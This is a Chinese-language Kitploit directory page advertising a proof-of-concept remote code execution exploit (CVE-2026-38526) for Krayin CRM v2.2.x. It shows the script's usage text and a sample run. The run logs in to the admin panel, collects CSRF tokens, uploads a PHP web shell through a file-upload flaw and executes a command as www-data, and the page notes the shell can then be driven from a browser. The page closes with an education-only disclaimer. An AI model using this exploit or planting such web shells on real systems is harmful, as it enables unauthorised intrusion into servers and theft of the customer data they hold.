Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-38526-KrayinCRM-RCE — CVE-2026-38526 漏洞利用 | 作者:infrar3d | Kitploit
工具/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce

CVE-2026-38526-KrayinCRM-RCE

CVE-2026-38526 漏洞利用 | 作者:infrar3d

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1个月前尚未审核

CVE-2026-38526 - Krayin CRM RCE

由 infrar3d 编写

这是一个专为 Krayin CRM v2.2.x(一款开源客户关系管理系统)设计的远程代码执行(RCE)概念验证(PoC)脚本。该脚本可自动化利用 CRM 管理界面中的文件上传漏洞,在目标服务器上实现远程命令执行。

用法:

root@kitploit:~
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND

Krayin CRM RCE Exploit

options:
  -h, --help            show this help message and exit
  -rh, --rhost RHOST    Remote host
  -u, --username USERNAME
                        Username or E-mail
  -p, --password PASSWORD
                        Password
  -c, --command COMMAND
                        Command to execute
                                         

示例:

root@kitploit:~
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'

[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================
                                                                                         

默认情况下,该脚本会从 revshells.com 上传一个 PHP cmd 类型的 shell。

利用完成后,你可以在浏览器中打开该 shell,并通过网页发送命令。

⚠️ 免责声明 ⚠️

本软件及概念验证代码仅用于教育和研究目的。

  • 作者不对因使用本程序造成的任何滥用或损害负责。
  • 未经明确事先许可,请勿对任何系统使用本工具。
  • 未经同意使用本工具攻击目标属于违法行为。

你有责任遵守所有适用法律。请合乎道德地、负责任地使用本工具。

下载工具